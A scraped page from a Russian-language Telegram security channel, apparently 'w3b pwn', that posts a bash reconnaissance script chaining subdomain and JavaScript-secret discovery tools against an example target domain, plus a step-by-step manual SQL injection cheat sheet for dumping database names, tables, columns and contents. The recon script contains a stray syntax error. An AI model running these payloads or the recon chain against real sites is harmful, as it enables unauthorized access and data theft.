#Beacon
1.19K subscribers
272 photos
26 videos
130 files
1.83K links
Прожаренный цуберпохек

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
Download Telegram
Channel name was changed to «w3b pwn»
#!/bin/bash
#./script.sh uber.com
echo "Find subs"
subfinder -d $1 > subfinder;
echo "Find alive subs"
cat subfinder | httpx > subs;
echo "Find JS files & JS Secrets"
cat subs | gauplus | grep -iE '\.js' | grep -ivE '\.json' > js; cat js | while read line ; do python3 linkfinder.py -i $line -o cli; fi; done;
echo "Use screenshoter"
python EyeWitness.py -f js --web;

https://github.com/FortyNorthSecurity/EyeWitness/tree/master/Python
https://github.com/projectdiscovery/subfinder
https://github.com/bp0lr/gauplus
SQL INJ ( руками )
Определить количество колонок - union select 1,2,n+1 - пока не пропадет ошибка
Определить количество полей - order by 10 | order by 20 | order by 31 | order by [n] - пока не пропадет ошибка

Запрос, что определяет точное количество полей и колонок выглядит примерно так - union select 1,2,3,n+1 order by [n]

Название базы данных - database(), @@database
Версия базы данных - version(), @@version
Название таблицы - union select 1,table_name,2,n+1 from information_schema.tables where table_schema=database() --
Название колонки - union select 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='НАЗВАНИЕ ТАБЛИЦ С ЗАПРОСА ВЫШЕ' --
Получаем информацию из колонок таблицы: union select 1,название колонки,3,4,5,6,название колонки,8,9,10,11 from НАЗВАНИЕ ТАБЛИЦЫ --
Объединить вывод: union select 1, group_concat(название колонки, название колонки, название колонки и так далее),3,4,5,6,7,8,9,10,11 from НАЗВАНИЕ ТАБЛИЦЫ --

https://infosecwriteups.com/identifying-exploiting-sql-injection-manual-automated-79c932f0c9b5
#Beacon pinned «https://dou.ua/lenta/articles/android-app-secutity-testing/»
#Beacon pinned «https://habr.com/ru/post/503284/»
#Beacon pinned «https://blog.risingstack.com/node-js-security-checklist/»